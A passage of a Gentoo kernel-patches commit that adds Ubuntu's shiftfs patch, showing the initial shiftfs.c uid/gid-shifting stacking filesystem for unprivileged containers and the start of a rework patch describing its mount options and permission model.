Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sun Feb 26 18:16:47 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=2448ffe1

Add shiftfs

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                       |    4 +
 5000_shiftfs-6.1-2023-01-31.patch | 6554 +++++++++++++++++++++++++++++++++++++
 2 files changed, 6558 insertions(+)

diff --git a/0000_README b/0000_README
index 4604bf4f..c6d94abc 100644
--- a/0000_README
+++ b/0000_README
@@ -143,6 +143,10 @@ Patch:  4567_distro-Gentoo-Kconfig.patch
 From:   Tom Wijsman <TomWij@gentoo.org>
 Desc:   Add Gentoo Linux support config settings and defaults.
 
+Patch:  5000_shiftfs-6.1-2023-01-31.patch
+From:   https://git.launchpad.net/~ubuntu-kernel/ubuntu/+source/linux/+git/unstable
+Desc:   Kernel module that provides a kernel filesystem for uid/gid shifting
+
 Patch:  5010_enable-cpu-optimizations-universal.patch
 From:   https://github.com/graysky2/kernel_compiler_patch
 Desc:   Kernel >= 5.15 patch enables gcc = v11.1+ optimizations for additional CPUs.

diff --git a/5000_shiftfs-6.1-2023-01-31.patch b/5000_shiftfs-6.1-2023-01-31.patch
new file mode 100644
index 00000000..a5b40429
--- /dev/null
+++ b/5000_shiftfs-6.1-2023-01-31.patch
@@ -0,0 +1,6554 @@
+From b554e3101fdc94969141491a4234b3c931683b5c Mon Sep 17 00:00:00 2001
+From: James Bottomley <James.Bottomley@HansenPartnership.com>
+Date: Thu, 4 Apr 2019 15:39:11 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: uid/gid shifting bind mount
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1823186
+
+This allows any subtree to be uid/gid shifted and bound elsewhere.  It
+does this by operating similarly to overlayfs.  Its primary use is for
+shifting the underlying uids of filesystems used to support
+unprivileged (uid shifted) containers.  The usual use case here is
+that the container is operating with a uid shifted unprivileged root
+but sometimes needs to make use of or work with a filesystem image
+that has root at real uid 0.
+
+The mechanism is to allow any subordinate mount namespace to mount a
+shiftfs filesystem (by marking it FS_USERNS_MOUNT) but only allowing
+it to mount marked subtrees (using the -o mark option as root).  Once
+mounted, the subtree is mapped via the super block user namespace so
+that the interior ids of the mounting user namespace are the ids
+written to the filesystem.
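+
+A minimal usage sketch (the paths here are hypothetical):
+
+  # as real root: mark the subtree as shiftable
+  mount -t shiftfs -o mark /srv/rootfs /srv/rootfs
+
+  # as root inside the unprivileged user namespace: mount the marked
+  # subtree with the ids shifted
+  mount -t shiftfs /srv/rootfs /mnt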
+
+Signed-off-by: James Bottomley <James.Bottomley@HansenPartnership.com>
+[ saf: use designated initializers for path declarations to fix errors
+  with struct randomization ]
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+[update: port to 5.0]
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/Kconfig                 |   8 +
+ fs/Makefile                |   1 +
+ fs/shiftfs.c               | 780 +++++++++++++++++++++++++++++++++++++
+ include/uapi/linux/magic.h |   2 +
+ 4 files changed, 791 insertions(+)
+ create mode 100644 fs/shiftfs.c
+
+diff --git a/fs/Kconfig b/fs/Kconfig
+index 2685a4d0d353..b53bece1e940 100644
+--- a/fs/Kconfig
++++ b/fs/Kconfig
+@@ -128,6 +128,14 @@ source "fs/autofs/Kconfig"
+ source "fs/fuse/Kconfig"
+ source "fs/overlayfs/Kconfig"
+ 
++config SHIFT_FS
++	tristate "UID/GID shifting overlay filesystem for containers"
++	help
++	  This filesystem can overlay any mounted filesystem and shift
++	  the uid/gid the files appear at.  The idea is that
++	  unprivileged containers can use this to mount root volumes
++	  using this technique.
++
+ menu "Caches"
+ 
+ source "fs/netfs/Kconfig"
+diff --git a/fs/Makefile b/fs/Makefile
+index 4dea17840761..628632dcb9b1 100644
+--- a/fs/Makefile
++++ b/fs/Makefile
+@@ -137,3 +137,4 @@ obj-$(CONFIG_EFIVAR_FS)		+= efivarfs/
+ obj-$(CONFIG_EROFS_FS)		+= erofs/
+ obj-$(CONFIG_VBOXSF_FS)		+= vboxsf/
+ obj-$(CONFIG_ZONEFS_FS)		+= zonefs/
++obj-$(CONFIG_SHIFT_FS)		+= shiftfs.o
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+new file mode 100644
+index 000000000000..f7cada126daa
+--- /dev/null
++++ b/fs/shiftfs.c
+@@ -0,0 +1,780 @@
++#include <linux/cred.h>
++#include <linux/mount.h>
++#include <linux/file.h>
++#include <linux/fs.h>
++#include <linux/namei.h>
++#include <linux/module.h>
++#include <linux/kernel.h>
++#include <linux/magic.h>
++#include <linux/parser.h>
++#include <linux/seq_file.h>
++#include <linux/statfs.h>
++#include <linux/slab.h>
++#include <linux/user_namespace.h>
++#include <linux/uidgid.h>
++#include <linux/xattr.h>
++
++struct shiftfs_super_info {
++	struct vfsmount *mnt;
++	struct user_namespace *userns;
++	bool mark;
++};
++
++static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode,
++				       struct dentry *dentry);
++
++enum {
++	OPT_MARK,
++	OPT_LAST,
++};
++
++/* global filesystem options */
++static const match_table_t tokens = {
++	{ OPT_MARK, "mark" },
++	{ OPT_LAST, NULL }
++};
++
++static const struct cred *shiftfs_get_up_creds(struct super_block *sb)
++{
++	struct shiftfs_super_info *ssi = sb->s_fs_info;
++	struct cred *cred = prepare_creds();
++
++	if (!cred)
++		return NULL;
++
++	cred->fsuid = KUIDT_INIT(from_kuid(sb->s_user_ns, cred->fsuid));
++	cred->fsgid = KGIDT_INIT(from_kgid(sb->s_user_ns, cred->fsgid));
++	put_user_ns(cred->user_ns);
++	cred->user_ns = get_user_ns(ssi->userns);
++
++	return cred;
++}
++
++static const struct cred *shiftfs_new_creds(const struct cred **newcred,
++					    struct super_block *sb)
++{
++	const struct cred *cred = shiftfs_get_up_creds(sb);
++
++	*newcred = cred;
++
++	if (cred)
++		cred = override_creds(cred);
++	else
++		printk(KERN_ERR "shiftfs: Credential override failed: no memory\n");
++
++	return cred;
++}
++
++static void shiftfs_old_creds(const struct cred *oldcred,
++			      const struct cred **newcred)
++{
++	if (!*newcred)
++		return;
++
++	revert_creds(oldcred);
++	put_cred(*newcred);
++}
++
++static int shiftfs_parse_options(struct shiftfs_super_info *ssi, char *options)
++{
++	char *p;
++	substring_t args[MAX_OPT_ARGS];
++
++	ssi->mark = false;
++
++	while ((p = strsep(&options, ",")) != NULL) {
++		int token;
++
++		if (!*p)
++			continue;
++
++		token = match_token(p, tokens, args);
++		switch (token) {
++		case OPT_MARK:
++			ssi->mark = true;
++			break;
++		default:
++			return -EINVAL;
++		}
++	}
++	return 0;
++}
++
++static void shiftfs_d_release(struct dentry *dentry)
++{
++	struct dentry *real = dentry->d_fsdata;
++
++	dput(real);
++}
++
++static struct dentry *shiftfs_d_real(struct dentry *dentry,
++				     const struct inode *inode)
++{
++	struct dentry *real = dentry->d_fsdata;
++
++	if (unlikely(real->d_flags & DCACHE_OP_REAL))
++		return real->d_op->d_real(real, real->d_inode);
++
++	return real;
++}
++
++static int shiftfs_d_weak_revalidate(struct dentry *dentry, unsigned int flags)
++{
++	struct dentry *real = dentry->d_fsdata;
++
++	if (d_unhashed(real))
++		return 0;
++
++	if (!(real->d_flags & DCACHE_OP_WEAK_REVALIDATE))
++		return 1;
++
++	return real->d_op->d_weak_revalidate(real, flags);
++}
++
++static int shiftfs_d_revalidate(struct dentry *dentry, unsigned int flags)
++{
++	struct dentry *real = dentry->d_fsdata;
++	int ret;
++
++	if (d_unhashed(real))
++		return 0;
++
++	/*
++	 * inode state of underlying changed from positive to negative
++	 * or vice versa; force a lookup to update our view
++	 */
++	if (d_is_negative(real) != d_is_negative(dentry))
++		return 0;
++
++	if (!(real->d_flags & DCACHE_OP_REVALIDATE))
++		return 1;
++
++	ret = real->d_op->d_revalidate(real, flags);
++
++	if (ret == 0 && !(flags & LOOKUP_RCU))
++		d_invalidate(real);
++
++	return ret;
++}
++
++static const struct dentry_operations shiftfs_dentry_ops = {
++	.d_release	= shiftfs_d_release,
++	.d_real		= shiftfs_d_real,
++	.d_revalidate	= shiftfs_d_revalidate,
++	.d_weak_revalidate = shiftfs_d_weak_revalidate,
++};
++
++static int shiftfs_readlink(struct dentry *dentry, char __user *data,
++			    int flags)
++{
++	struct dentry *real = dentry->d_fsdata;
++	const struct inode_operations *iop = real->d_inode->i_op;
++
++	if (iop->readlink)
++		return iop->readlink(real, data, flags);
++
++	return -EINVAL;
++}
++
++static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode,
++				    struct delayed_call *done)
++{
++	if (dentry) {
++		struct dentry *real = dentry->d_fsdata;
++		struct inode *reali = real->d_inode;
++		const struct inode_operations *iop = reali->i_op;
++		const char *res = ERR_PTR(-EPERM);
++
++		if (iop->get_link)
++			res = iop->get_link(real, reali, done);
++
++		return res;
++	} else {
++		/* RCU lookup not supported */
++		return ERR_PTR(-ECHILD);
++	}
++}
++
++static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
++			    const char *name, const void *value,
++			    size_t size, int flags)
++{
++	struct dentry *real = dentry->d_fsdata;
++	int err = -EOPNOTSUPP;
++	const struct cred *oldcred, *newcred;
++
++	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++	err = vfs_setxattr(real, name, value, size, flags);
++	shiftfs_old_creds(oldcred, &newcred);
++
++	return err;
++}
++
++static int shiftfs_xattr_get(const struct xattr_handler *handler,
++			     struct dentry *dentry, struct inode *inode,
++			     const char *name, void *value, size_t size)
++{
++	struct dentry *real = dentry->d_fsdata;
++	int err;
++	const struct cred *oldcred, *newcred;
++
++	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++	err = vfs_getxattr(real, name, value, size);
++	shiftfs_old_creds(oldcred, &newcred);
++
++	return err;
++}
++
++static ssize_t shiftfs_listxattr(struct dentry *dentry, char *list,
++				 size_t size)
++{
++	struct dentry *real = dentry->d_fsdata;
++	int err;
++	const struct cred *oldcred, *newcred;
++
++	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++	err = vfs_listxattr(real, list, size);
++	shiftfs_old_creds(oldcred, &newcred);
++
++	return err;
++}
++
++static int shiftfs_removexattr(struct dentry *dentry, const char *name)
++{
++	struct dentry *real = dentry->d_fsdata;
++	int err;
++	const struct cred *oldcred, *newcred;
++
++	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++	err = vfs_removexattr(real, name);
++	shiftfs_old_creds(oldcred, &newcred);
++
++	return err;
++}
++
++static int shiftfs_xattr_set(const struct xattr_handler *handler,
++			     struct dentry *dentry, struct inode *inode,
++			     const char *name, const void *value, size_t size,
++			     int flags)
++{
++	if (!value)
++		return shiftfs_removexattr(dentry, name);
++	return shiftfs_setxattr(dentry, inode, name, value, size, flags);
++}
++
++static void shiftfs_fill_inode(struct inode *inode, struct dentry *dentry)
++{
++	struct inode *reali;
++
++	if (!dentry)
++		return;
++
++	reali = dentry->d_inode;
++
++	if (!reali->i_op->get_link)
++		inode->i_opflags |= IOP_NOFOLLOW;
++
++	inode->i_mapping = reali->i_mapping;
++	inode->i_private = dentry;
++}
++
++static int shiftfs_make_object(struct inode *dir, struct dentry *dentry,
++			       umode_t mode, const char *symlink,
++			       struct dentry *hardlink, bool excl)
++{
++	struct dentry *real = dir->i_private, *new = dentry->d_fsdata;
++	struct inode *reali = real->d_inode, *newi;
++	const struct inode_operations *iop = reali->i_op;
++	int err;
++	const struct cred *oldcred, *newcred;
++	bool op_ok = false;
++
++	if (hardlink) {
++		op_ok = iop->link;
++	} else {
++		switch (mode & S_IFMT) {
++		case S_IFDIR:
++			op_ok = iop->mkdir;
++			break;
++		case S_IFREG:
++			op_ok = iop->create;
++			break;
++		case S_IFLNK:
++			op_ok = iop->symlink;
++		}
++	}
++	if (!op_ok)
++		return -EINVAL;
++
++
++	newi = shiftfs_new_inode(dentry->d_sb, mode, NULL);
++	if (!newi)
++		return -ENOMEM;
++
++	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++
++	inode_lock_nested(reali, I_MUTEX_PARENT);
++
++	err = -EINVAL;		/* shut gcc up about uninit var */
++	if (hardlink) {
++		struct dentry *realhardlink = hardlink->d_fsdata;
++
++		err = vfs_link(realhardlink, reali, new, NULL);
++	} else {
++		switch (mode & S_IFMT) {
++		case S_IFDIR:
++			err = vfs_mkdir(reali, new, mode);
++			break;
++		case S_IFREG:
++			err = vfs_create(reali, new, mode, excl);
++			break;
++		case S_IFLNK:
++			err = vfs_symlink(reali, new, symlink);
++		}
++	}
++
++	shiftfs_old_creds(oldcred, &newcred);
++
++	if (err)
++		goto out_dput;
++
++	shiftfs_fill_inode(newi, new);
++
++	d_instantiate(dentry, newi);
++
++	new = NULL;
++	newi = NULL;
++
++ out_dput:
++	dput(new);
++	iput(newi);
++	inode_unlock(reali);
++
++	return err;
++}
++
++static int shiftfs_create(struct inode *dir, struct dentry *dentry,
++			  umode_t mode,  bool excl)
++{
++	mode |= S_IFREG;
++
++	return shiftfs_make_object(dir, dentry, mode, NULL, NULL, excl);
++}
++
++static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry,
++			 umode_t mode)
++{
++	mode |= S_IFDIR;
++
++	return shiftfs_make_object(dir, dentry, mode, NULL, NULL, false);
++}
++
++static int shiftfs_link(struct dentry *hardlink, struct inode *dir,
++			struct dentry *dentry)
++{
++	return shiftfs_make_object(dir, dentry, 0, NULL, hardlink, false);
++}
++
++static int shiftfs_symlink(struct inode *dir, struct dentry *dentry,
++			   const char *symlink)
++{
++	return shiftfs_make_object(dir, dentry, S_IFLNK, symlink, NULL, false);
++}
++
++static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
++{
++	struct dentry *real = dir->i_private, *new = dentry->d_fsdata;
++	struct inode *reali = real->d_inode;
++	int err;
++	const struct cred *oldcred, *newcred;
++
++	inode_lock_nested(reali, I_MUTEX_PARENT);
++
++	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++
++	if (rmdir)
++		err = vfs_rmdir(reali, new);
++	else
++		err = vfs_unlink(reali, new, NULL);
++
++	shiftfs_old_creds(oldcred, &newcred);
++	inode_unlock(reali);
++
++	return err;
++}
++
++static int shiftfs_unlink(struct inode *dir, struct dentry *dentry)
++{
++	return shiftfs_rm(dir, dentry, false);
++}
++
++static int shiftfs_rmdir(struct inode *dir, struct dentry *dentry)
++{
++	return shiftfs_rm(dir, dentry, true);
++}
++
++static int shiftfs_rename(struct inode *olddir, struct dentry *old,
++			  struct inode *newdir, struct dentry *new,
++			  unsigned int flags)
++{
++	struct dentry *rodd = olddir->i_private, *rndd = newdir->i_private,
++		*realold = old->d_fsdata,
++		*realnew = new->d_fsdata, *trap;
++	struct inode *realolddir = rodd->d_inode, *realnewdir = rndd->d_inode;
++	int err = -EINVAL;
++	const struct cred *oldcred, *newcred;
++
++	trap = lock_rename(rndd, rodd);
++
++	if (trap == realold || trap == realnew)
++		goto out_unlock;
++
++	oldcred = shiftfs_new_creds(&newcred, old->d_sb);
++
++	err = vfs_rename(realolddir, realold, realnewdir,
++			 realnew, NULL, flags);
++
++	shiftfs_old_creds(oldcred, &newcred);
++
++ out_unlock:
++	unlock_rename(rndd, rodd);
++
++	return err;
++}
++
++static struct dentry *shiftfs_lookup(struct inode *dir, struct dentry *dentry,
++				     unsigned int flags)
++{
++	struct dentry *real = dir->i_private, *new;
++	struct inode *reali = real->d_inode, *newi;
++	const struct cred *oldcred, *newcred;
++
++	inode_lock(reali);
++	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++	new = lookup_one_len(dentry->d_name.name, real, dentry->d_name.len);
++	shiftfs_old_creds(oldcred, &newcred);
++	inode_unlock(reali);
++
++	if (IS_ERR(new))
++		return new;
++
++	dentry->d_fsdata = new;
++
++	newi = NULL;
++	if (!new->d_inode)
++		goto out;
++
++	newi = shiftfs_new_inode(dentry->d_sb, new->d_inode->i_mode, new);
++	if (!newi) {
++		dput(new);
++		return ERR_PTR(-ENOMEM);
++	}
++
++ out:
++	return d_splice_alias(newi, dentry);
++}
++
++static int shiftfs_permission(struct inode *inode, int mask)
++{
++	struct dentry *real = inode->i_private;
++	struct inode *reali = real->d_inode;
++	const struct inode_operations *iop = reali->i_op;
++	int err;
++	const struct cred *oldcred, *newcred;
++
++	if (mask & MAY_NOT_BLOCK)
++		return -ECHILD;
++
++	oldcred = shiftfs_new_creds(&newcred, inode->i_sb);
++	if (iop->permission)
++		err = iop->permission(reali, mask);
++	else
++		err = generic_permission(reali, mask);
++	shiftfs_old_creds(oldcred, &newcred);
++
++	return err;
++}
++
++static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
++{
++	struct dentry *real = dentry->d_fsdata;
++	struct inode *reali = real->d_inode;
++	const struct inode_operations *iop = reali->i_op;
++	struct iattr newattr = *attr;
++	const struct cred *oldcred, *newcred;
++	struct super_block *sb = dentry->d_sb;
++	int err;
++
++	newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid));
++	newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid));
++
++	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++	inode_lock(reali);
++	if (iop->setattr)
++		err = iop->setattr(real, &newattr);
++	else
++		err = simple_setattr(real, &newattr);
++	inode_unlock(reali);
++	shiftfs_old_creds(oldcred, &newcred);
++
++	if (err)
++		return err;
++
++	/* all OK, reflect the change on our inode */
++	setattr_copy(d_inode(dentry), attr);
++	return 0;
++}
++
++static int shiftfs_getattr(const struct path *path, struct kstat *stat,
++			   u32 request_mask, unsigned int query_flags)
++{
++	struct inode *inode = path->dentry->d_inode;
++	struct dentry *real = path->dentry->d_fsdata;
++	struct inode *reali = real->d_inode;
++	const struct inode_operations *iop = reali->i_op;
++	struct path newpath = { .mnt = path->dentry->d_sb->s_fs_info, .dentry = real };
++	int err = 0;
++
++	if (iop->getattr)
++		err = iop->getattr(&newpath, stat, request_mask, query_flags);
++	else
++		generic_fillattr(reali, stat);
++
++	if (err)
++		return err;
++
++	/* transform the underlying id */
++	stat->uid = make_kuid(inode->i_sb->s_user_ns, __kuid_val(stat->uid));
++	stat->gid = make_kgid(inode->i_sb->s_user_ns, __kgid_val(stat->gid));
++	return 0;
++}
++
++static const struct inode_operations shiftfs_inode_ops = {
++	.lookup		= shiftfs_lookup,
++	.getattr	= shiftfs_getattr,
++	.setattr	= shiftfs_setattr,
++	.permission	= shiftfs_permission,
++	.mkdir		= shiftfs_mkdir,
++	.symlink	= shiftfs_symlink,
++	.get_link	= shiftfs_get_link,
++	.readlink	= shiftfs_readlink,
++	.unlink		= shiftfs_unlink,
++	.rmdir		= shiftfs_rmdir,
++	.rename		= shiftfs_rename,
++	.link		= shiftfs_link,
++	.create		= shiftfs_create,
++	.mknod		= NULL,	/* no special files currently */
++	.listxattr	= shiftfs_listxattr,
++};
++
++static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode,
++				       struct dentry *dentry)
++{
++	struct inode *inode;
++
++	inode = new_inode(sb);
++	if (!inode)
++		return NULL;
++
++	/*
++	 * our inode is completely vestigial.  All lookups, getattr
++	 * and permission checks are done on the underlying inode, so
++	 * what the user sees is entirely from the underlying inode.
++	 */
++	mode &= S_IFMT;
++
++	inode->i_ino = get_next_ino();
++	inode->i_mode = mode;
++	inode->i_flags |= S_NOATIME | S_NOCMTIME;
++
++	inode->i_op = &shiftfs_inode_ops;
++
++	shiftfs_fill_inode(inode, dentry);
++
++	return inode;
++}
++
++static int shiftfs_show_options(struct seq_file *m, struct dentry *dentry)
++{
++	struct super_block *sb = dentry->d_sb;
++	struct shiftfs_super_info *ssi = sb->s_fs_info;
++
++	if (ssi->mark)
++		seq_show_option(m, "mark", NULL);
++
++	return 0;
++}
++
++static int shiftfs_statfs(struct dentry *dentry, struct kstatfs *buf)
++{
++	struct super_block *sb = dentry->d_sb;
++	struct shiftfs_super_info *ssi = sb->s_fs_info;
++	struct dentry *root = sb->s_root;
++	struct dentry *realroot = root->d_fsdata;
++	struct path realpath = { .mnt = ssi->mnt, .dentry = realroot };
++	int err;
++
++	err = vfs_statfs(&realpath, buf);
++	if (err)
++		return err;
++
++	buf->f_type = sb->s_magic;
++
++	return 0;
++}
++
++static void shiftfs_put_super(struct super_block *sb)
++{
++	struct shiftfs_super_info *ssi = sb->s_fs_info;
++
++	mntput(ssi->mnt);
++	put_user_ns(ssi->userns);
++	kfree(ssi);
++}
++
++static const struct xattr_handler shiftfs_xattr_handler = {
++	.prefix = "",
++	.get    = shiftfs_xattr_get,
++	.set    = shiftfs_xattr_set,
++};
++
++const struct xattr_handler *shiftfs_xattr_handlers[] = {
++	&shiftfs_xattr_handler,
++	NULL
++};
++
++static const struct super_operations shiftfs_super_ops = {
++	.put_super	= shiftfs_put_super,
++	.show_options	= shiftfs_show_options,
++	.statfs		= shiftfs_statfs,
++};
++
++struct shiftfs_data {
++	void *data;
++	const char *path;
++};
++
++static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
++			      int silent)
++{
++	struct shiftfs_data *data = raw_data;
++	char *name = kstrdup(data->path, GFP_KERNEL);
++	int err = -ENOMEM;
++	struct shiftfs_super_info *ssi = NULL;
++	struct path path;
++	struct dentry *dentry;
++
++	if (!name)
++		goto out;
++
++	ssi = kzalloc(sizeof(*ssi), GFP_KERNEL);
++	if (!ssi)
++		goto out;
++
++	err = -EPERM;
++	err = shiftfs_parse_options(ssi, data->data);
++	if (err)
++		goto out;
++
++	/* to mark a mount point, must be real root */
++	if (ssi->mark && !capable(CAP_SYS_ADMIN))
++		goto out;
++
++	/* else to mount a mark, must be userns admin */
++	if (!ssi->mark && !ns_capable(current_user_ns(), CAP_SYS_ADMIN))
++		goto out;
++
++	err = kern_path(name, LOOKUP_FOLLOW, &path);
++	if (err)
++		goto out;
++
++	err = -EPERM;
++
++	if (!S_ISDIR(path.dentry->d_inode->i_mode)) {
++		err = -ENOTDIR;
++		goto out_put;
++	}
++
++	sb->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1;
++	if (sb->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
++		printk(KERN_ERR "shiftfs: maximum stacking depth exceeded\n");
++		err = -EINVAL;
++		goto out_put;
++	}
++
++	if (ssi->mark) {
++		/*
++		 * this part is visible unshifted, so make sure no
++		 * executables that could be used to give suid
++		 * privileges
++		 */
++		sb->s_iflags = SB_I_NOEXEC;
++		ssi->mnt = path.mnt;
++		dentry = path.dentry;
++	} else {
++		struct shiftfs_super_info *mp_ssi;
++
++		/*
++		 * this leg executes if we're admin capable in
++		 * the namespace, so be very careful
++		 */
++		if (path.dentry->d_sb->s_magic != SHIFTFS_MAGIC)
++			goto out_put;
++		mp_ssi = path.dentry->d_sb->s_fs_info;
++		if (!mp_ssi->mark)
++			goto out_put;
++		ssi->mnt = mntget(mp_ssi->mnt);
++		dentry = dget(path.dentry->d_fsdata);
++		path_put(&path);
++	}
++	ssi->userns = get_user_ns(dentry->d_sb->s_user_ns);
++	sb->s_fs_info = ssi;
++	sb->s_magic = SHIFTFS_MAGIC;
++	sb->s_op = &shiftfs_super_ops;
++	sb->s_xattr = shiftfs_xattr_handlers;
++	sb->s_d_op = &shiftfs_dentry_ops;
++	sb->s_root = d_make_root(shiftfs_new_inode(sb, S_IFDIR, dentry));
++	sb->s_root->d_fsdata = dentry;
++
++	return 0;
++
++ out_put:
++	path_put(&path);
++ out:
++	kfree(name);
++	kfree(ssi);
++	return err;
++}
++
++static struct dentry *shiftfs_mount(struct file_system_type *fs_type,
++				    int flags, const char *dev_name, void *data)
++{
++	struct shiftfs_data d = { data, dev_name };
++
++	return mount_nodev(fs_type, flags, &d, shiftfs_fill_super);
++}
++
++static struct file_system_type shiftfs_type = {
++	.owner		= THIS_MODULE,
++	.name		= "shiftfs",
++	.mount		= shiftfs_mount,
++	.kill_sb	= kill_anon_super,
++	.fs_flags	= FS_USERNS_MOUNT,
++};
++
++static int __init shiftfs_init(void)
++{
++	return register_filesystem(&shiftfs_type);
++}
++
++static void __exit shiftfs_exit(void)
++{
++	unregister_filesystem(&shiftfs_type);
++}
++
++MODULE_ALIAS_FS("shiftfs");
++MODULE_AUTHOR("James Bottomley");
++MODULE_DESCRIPTION("uid/gid shifting bind filesystem");
++MODULE_LICENSE("GPL v2");
++module_init(shiftfs_init)
++module_exit(shiftfs_exit)
+diff --git a/include/uapi/linux/magic.h b/include/uapi/linux/magic.h
+index 6325d1d0e90f..1f70efb41565 100644
+--- a/include/uapi/linux/magic.h
++++ b/include/uapi/linux/magic.h
+@@ -102,4 +102,6 @@
+ #define DEVMEM_MAGIC		0x454d444d	/* "DMEM" */
+ #define SECRETMEM_MAGIC		0x5345434d	/* "SECM" */
+ 
++#define SHIFTFS_MAGIC		0x6a656a62
++
+ #endif /* __LINUX_MAGIC_H__ */
+-- 
+2.39.2
+
+From 7b502b7e97db8ec9deff14f434eed2f2fbc0cd2f Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian@brauner.io>
+Date: Thu, 4 Apr 2019 15:39:12 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: rework and extend
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1823186
+
+/* Introduction */
+The shiftfs filesystem is implemented as a stacking filesystem and, as such,
+shares concepts with overlayfs and ecryptfs.
+Usually, shiftfs will be stacked upon another filesystem. The filesystem on
+top - shiftfs - is referred to as "upper filesystem" or "overlay" and the
+filesystem it is stacked upon is referred to as "lower filesystem" or
+"underlay".
+
+/* Marked and Unmarked shiftfs mounts */
+To use shiftfs it is necessary that a given mount is marked as shiftable via
+the "mark" mount option. Any mount of shiftfs without the "mark" mount option
+not on top of a shiftfs mount with the "mark" mount option will be refused with
+EPERM.
+After a marked shiftfs mount has been performed other shiftfs mounts
+referencing the marked shiftfs mount can be created. These secondary shiftfs
+mounts are usually the ones of interest.
+The marked shiftfs mount will take a reference to the underlying mountpoint of
+the directory it is marking as shiftable. Any unmarked shiftfs mounts
+referencing this marked shiftfs mount will take a second reference to this
+directory as well. This ensures that the underlying marked shiftfs mount can be
+unmounted, thereby dropping the reference to the underlying directory without
+invalidating the mountpoint of said directory since the non-marked shiftfs
+mount still holds another reference to it.
+
+/* Stacking Depth */
+Shiftfs tries to keep the stack as flat as possible to avoid hitting the
+kernel-enforced filesystem stacking limit.
+
+/* Permission Model */
+When the mark shiftfs mount is created shiftfs will record the credentials of
+the creator of the super block and stash them in the super block. When other
+non-mark shiftfs mounts are created that reference the mark shiftfs mount they
+will stash another reference to the creator's credentials. Before calling into
+the underlying filesystem shiftfs will switch to the creator's credentials and
+revert to the original credentials after the underlying filesystem operation
+returns.
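+
+In pseudocode the credential switch looks roughly like this (a sketch of the
+pattern, built on the kernel's override_creds()/revert_creds() helpers, not a
+copy of the exact code below):
+
+  const struct cred *oldcred;
+
+  oldcred = override_creds(sbinfo->creator_cred); /* act as the sb creator */
+  err = vfs_getxattr(...);                        /* any underlay operation */
+  revert_creds(oldcred);                          /* restore the caller */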
+
+/* Mount Options */
+- mark
+  When set, the mark mount option indicates that the mount in question is
+  allowed to be shifted. Since shiftfs is mountable by user namespace root in a
+  non-initial user namespace, this mount option ensures that the system
+  administrator has decided that the marked mount is safe to be shifted.
+  To mark a mount as shiftable CAP_SYS_ADMIN in the user namespace is required.
+- passthrough={0,1,2,3}
+  This mount option functions as a bitmask. When set to a non-zero value
+  shiftfs will try to act as an invisible shim sitting on top of the
+  underlying filesystem.
+  - 1: Shiftfs will report the filesystem type of the underlay for stat-like
+       system calls.
+  - 2: Shiftfs will pass whitelisted ioctl()s through to the underlay.
+  - 3: Shiftfs will apply both 1 and 2.
+Note that mount options on a marked mount cannot be changed.
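+
+For example (with a hypothetical path), a mark mount that passes the
+underlay's filesystem type through to stat-like system calls could be
+created with:
+
+  mount -t shiftfs -o mark,passthrough=1 /srv/rootfs /srv/rootfs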
+
+/* Extended Attributes */
+Shiftfs will make sure to translate extended attributes.
+
+/* Inode Numbers */
+Shiftfs inode numbers are copied up from the underlying filesystem, i.e.
+shiftfs inode numbers will be identical to the corresponding underlying
+filesystem's inode numbers. This has the advantage that inotify and friends
+should work out of the box.
+(In essence, shiftfs is nothing but a 1:1 mirror of the underlying filesystem's
+ dentries and inodes.)
+
+/* Device Support */
+Shiftfs only supports the creation of pipe and socket devices. Character and
+block devices cannot be created through shiftfs.
+
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/Kconfig   |   10 +
+ fs/shiftfs.c | 1852 ++++++++++++++++++++++++++++++++++++++++----------
+ 2 files changed, 1493 insertions(+), 369 deletions(-)
+
+diff --git a/fs/Kconfig b/fs/Kconfig
+index b53bece1e940..ada9a1234e72 100644
+--- a/fs/Kconfig
++++ b/fs/Kconfig
+@@ -136,6 +136,16 @@ config SHIFT_FS
+ 	  unprivileged containers can use this to mount root volumes
+ 	  using this technique.
+ 
++config SHIFT_FS_POSIX_ACL
++	bool "shiftfs POSIX Access Control Lists"
++	depends on SHIFT_FS
++	select FS_POSIX_ACL
++	help
++	  POSIX Access Control Lists (ACLs) support permissions for users and
++	  groups beyond the owner/group/world scheme.
++
